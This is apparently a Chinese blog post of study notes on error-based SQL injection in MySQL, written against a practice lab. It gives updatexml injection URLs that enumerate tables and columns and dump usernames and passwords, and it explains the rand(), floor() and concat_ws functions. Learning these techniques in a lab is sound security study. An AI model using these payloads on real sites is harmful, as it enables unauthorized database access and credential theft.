sql知识总结二(接上)

文章详细描述了SQL注入攻击中利用updatexml函数进行恶意操作的方法,涉及字符判断、闭合注入、数据表列名获取,以及使用rand()、floor()等函数进行随机化。强调了对这类函数的正确使用和安全防范的重要性。
摘要由CSDN通过智能技术生成

   2.updatexml报错注入

(1)判断字符型/数字型

如果是字符型再判断闭合方式(备注:结尾加--+看是否闭合,若页面正常执行则闭合完成)

?id=1") and 1=updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),3) --+

concat()  合并字符

优先执行彩色部分命令

?id=1" and 1=updatexml(1,concat('~',(select database())),3)--+

?id=1") and 1=updataxml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users')),3)

?id=1”) and 1=updatexml(1,concat(0x7e,(select group_concat(username,password) from users)),3) --+

?id=1")and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,':',password),1,30) from users)),3)--+

显示1~30字符

?id=1")and 1=updatexml(1,concat(0x7e,(select substring(group_concat(username,':',password),30,30) from users)),3)--+

#显示30~50字符,第30 个字符为

(2)靶机用户名密码存放位置的表名和列名

数据库information_schema中的数据表tables下数据列table_name和数据表columns下数据列column_name

(3)函数

database()数据库库名

group_concat() 把查询到的结果合并到一行显示

concat() 合并字符

substring(),00,30 从00个字符开始显示30个字符

3.floor报错注入

(1)涉及到的函数

rand()函数,随机返回0~1间的小数

floor()函数,小数向下取整数。  向上取整数ceiling()

concat_ws()函数,将括号内数据用第一个字段连接起来

group by 分组

as 别名

count(),汇总统计数量

limit,这里用于显示指定行数 

rand()函数

>select rand();计算结果在0~1之间

>select rand()*2;  计算结果在0~2之间

>select rand() from users;  根据users的行数随机显示结果

floor()函数

>select floor(rand()*2);  结果随机为0或1

concat_ws函数,将括号内数据用第一个字段连接起来

>select concat_ws('-',(select database()),floor(rand()*2);

  • 7
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 6
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值